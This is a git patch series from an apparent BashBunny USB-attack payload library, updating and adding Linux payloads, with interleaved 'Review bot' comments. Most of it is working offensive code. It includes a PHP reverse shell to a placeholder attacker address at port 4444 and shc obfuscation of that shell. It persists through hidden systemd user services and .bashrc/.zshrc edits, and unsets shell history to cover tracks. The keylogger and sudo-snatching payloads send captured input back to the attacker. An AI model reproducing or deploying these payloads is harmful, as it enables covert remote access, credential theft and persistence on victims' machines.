From bd4ec90d04bc3e98d46ceddc5b1b5ad48a1b70e3 Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Fri, 15 Apr 2022 02:39:21 +0530
Subject: [PATCH 1/5] Changing systemd Unit (#514)
* Uploaded BunnyLogger * uploading payload intel * Create README.md * Update README.md * uploaded LinuxPreter * uploaded FileRipper Faster executing version * Update README.md * fixing typo * uploaded sudoSnatch * Update README.md * deleting sudoSnatch * uploading payload * Delete payload.sh * Delete shell * Delete systemBus * Delete camPeek directory * Update payload.sh * Update payload.sh * Delete payloads/library/execution/FileRipper directory * Update payload.sh * Update payload.sh * Update payload.sh * Update payload.sh
---
payloads/library/credentials/BunnyLogger/payload.sh | 4 ++--
payloads/library/credentials/sudoSnatch/payload.sh | 4 ++--
payloads/library/execution/ScreenGrab/screenGrab/payload.sh | 2 +-
payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh | 2 +-
payloads/library/execution/camPeek/camPeek/payload.sh | 2 +-
payloads/library/remote_access/LinuxPreter/payload.sh | 2 +-
6 files changed, 8 insertions(+), 8 deletions(-)
diff --git a/payloads/library/credentials/BunnyLogger/payload.sh b/payloads/library/credentials/BunnyLogger/payload.sh
index 90d1ea36..fab26f88 100644
--- a/payloads/library/credentials/BunnyLogger/payload.sh
+++ b/payloads/library/credentials/BunnyLogger/payload.sh
@@ -11,10 +11,10 @@ chmod +x /var/tmp/.system/xinput
 echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
 chmod +x /var/tmp/.system/systemBus
 mkdir -p ~/.config/systemd/user
-echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
 chmod +x /var/tmp/.system/reboot
-echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
 systemctl --user daemon-reload
 systemctl --user enable --now systemBUS.service
 systemctl --user start --now systemBUS.service
diff --git a/payloads/library/credentials/sudoSnatch/payload.sh b/payloads/library/credentials/sudoSnatch/payload.sh
index a11c2654..56eb0443 100644
--- a/payloads/library/credentials/sudoSnatch/payload.sh
+++ b/payloads/library/credentials/sudoSnatch/payload.sh
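Review bot: The two rewritten `echo -e` lines switch `WantedBy=` to `default.target` without a comment saying why or what the script leaves on the host, and the commit message gives no reason either. As far as the hunk shows, these are user units under `~/.config/systemd/user`, where `multi-user.target` is a system-manager target and would presumably never be reached, so the change is what makes `systemctl --user enable` take effect. I would add above the first unit line `# user unit; enable links it into ~/.config/systemd/user/default.target.wants/ — cleanup: disable it, delete the unit files and /var/tmp/.system/`, since those paths are what a tester needs for removal and what a responder would look for. The same comment is missing in the sudoSnatch, ScreenGrab, bunnyDOS, camPeek and LinuxPreter hunks; each script continues outside its hunk.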
@@ -10,10 +10,10 @@ touch /var/tmp/.system/sysLog
 echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
 chmod +x /var/tmp/.system/systemBus
 mkdir -p ~/.config/systemd/user
-echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
 chmod +x /var/tmp/.system/reboot
-echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
 systemctl --user daemon-reload
 systemctl --user enable --now systemBUS.service
 systemctl --user start --now systemBUS.service
diff --git a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh
index ea0ff7a6..7c0eec75 100644
--- a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh
+++ b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh
@@ -10,7 +10,7 @@ mkdir /var/tmp/.system/sysLog
 cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus
 chmod +x /var/tmp/.system/systemBus
 mkdir -p ~/.config/systemd/user
-echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 systemctl --user daemon-reload
 systemctl --user enable --now systemBUS.service
 systemctl --user start --now systemBUS.service
diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh
index eeb3f5f8..e7b34aed 100644
--- a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh
+++ b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh
@@ -6,7 +6,7 @@ ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}')
 open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }')
 mkdir /var/tmp/.system/
 mkdir -p ~/.config/systemd/user
-echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service
+echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/libSystemIO.service
 cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/
 chmod +x /var/tmp/.system/systemIO
 for i in $open
diff --git a/payloads/library/execution/camPeek/camPeek/payload.sh b/payloads/library/execution/camPeek/camPeek/payload.sh
index 3759ce12..84d9f4d0 100644
--- a/payloads/library/execution/camPeek/camPeek/payload.sh
+++ b/payloads/library/execution/camPeek/camPeek/payload.sh
@@ -10,7 +10,7 @@ mkdir /var/tmp/.system/sysLog
 cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus
 chmod +x /var/tmp/.system/systemBus
 mkdir -p ~/.config/systemd/user
-echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 systemctl --user daemon-reload
 systemctl --user enable --now systemBUS.service
 systemctl --user start --now systemBUS.service
diff --git a/payloads/library/remote_access/LinuxPreter/payload.sh b/payloads/library/remote_access/LinuxPreter/payload.sh
index cfecd2cf..7bdb73ab 100644
--- a/payloads/library/remote_access/LinuxPreter/payload.sh
+++ b/payloads/library/remote_access/LinuxPreter/payload.sh
@@ -6,7 +6,7 @@ cp -r $mntt/tools/sysHandle.bin /var/tmp/.system chmod +x /var/tmp/.system/sysHandle.bin mkdir -p ~/.config/systemd/user/ systemctl --user start systemPer.service -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemPer.service echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit From 797cf561d5b9b0809910c346914bc0ac2eb9d43c Mon Sep 17 00:00:00 2001 
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Fri, 15 Apr 2022 02:40:51 +0530
Subject: [PATCH 2/5] persistentReverseBunny (#515)
* persistentReverseBunny Added obfuscation layer by completely encoding reverse shell mechanism. * fixing typo * adding payload
---
.../persistentReverseBunny/README.md | 36 +++++++++++++
.../persistentReverseBunny/payload.txt | 51 ++++++++++++++++++
.../persistentReverseBunny/payload.sh | 18 +++++++
.../persistentReverseBunny/shc | Bin 0 -> 68128 bytes
4 files changed, 105 insertions(+)
create mode 100644 payloads/library/remote_access/persistentReverseBunny/README.md
create mode 100644 payloads/library/remote_access/persistentReverseBunny/payload.txt
create mode 100644 payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh
create mode 100644 payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc
diff --git a/payloads/library/remote_access/persistentReverseBunny/README.md b/payloads/library/remote_access/persistentReverseBunny/README.md
new file mode 100644
index 00000000..e8ea4c13
--- /dev/null
+++ b/payloads/library/remote_access/persistentReverseBunny/README.md
@@ -0,0 +1,36 @@
+## About:
+* Title: persistentReverseBunny
+* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Remote Access
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, STORAGE
+
+## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs.
+
+### Workflow:
+Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell.
+
+### Algorithm:
+1. Stop storing history, this helps to keep tracks clear from begining.
+2. Creating reverse shell.
+3. Creating non-root systemd service.
+4. Enabling service.
+5. Starting service on trigger of firing terminal emulator/shell.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| ----------------------- | ----------------------------- |
+| payload.txt | /payloads/switch1/ |
+| persistentReverseBunny/ | /payloads/libray/ |
+
+### Note:
+* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`.
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/remote_access/persistentReverseBunny/payload.txt b/payloads/library/remote_access/persistentReverseBunny/payload.txt
new file mode 100644
index 00000000..de367d14
--- /dev/null
+++ b/payloads/library/remote_access/persistentReverseBunny/payload.txt
@@ -0,0 +1,51 @@
+# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Remote Access
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh \&
+Q ENTER
+Q STRING disown
+Q ENTER
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh
new file mode 100644
index 00000000..edd304f3
--- /dev/null
+++ b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh
@@ -0,0 +1,18 @@
+#!/bin/bash
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+mkdir /var/tmp/.system/
+echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop
+cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/
+chmod +x /var/tmp/.system/shc
+/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+rm /var/tmp/.system/pop*
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
+chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc
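Review bot: The script copies, marks executable and runs `shc`, which this patch adds only as a 68128-byte binary blob with no source, version or checksum, so nobody reviewing the change can tell what that executable does on the machine it runs on. I would record its origin next to the `cp` line, for example `# shc: prebuilt from <UPSTREAM_URL>, version <VERSION>, sha256 <SHA256>`, or build it from reviewed source instead of shipping the blob. The file also has no header listing what it leaves behind: `/var/tmp/.system/systemBus`, `~/.config/systemd/user/systemBUS.service`, and the `systemctl --user enable` lines appended to `~/.zshrc` and `~/.bashrc`. A short comment block at the top naming those paths would give the tester a cleanup list and a responder the artifacts to look for.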
diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc new file mode 100644 index 0000000000000000000000000000000000000000..8e7c686cb24cf609141927e625abb36a720e2c0b GIT binary patch literal 68128 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 
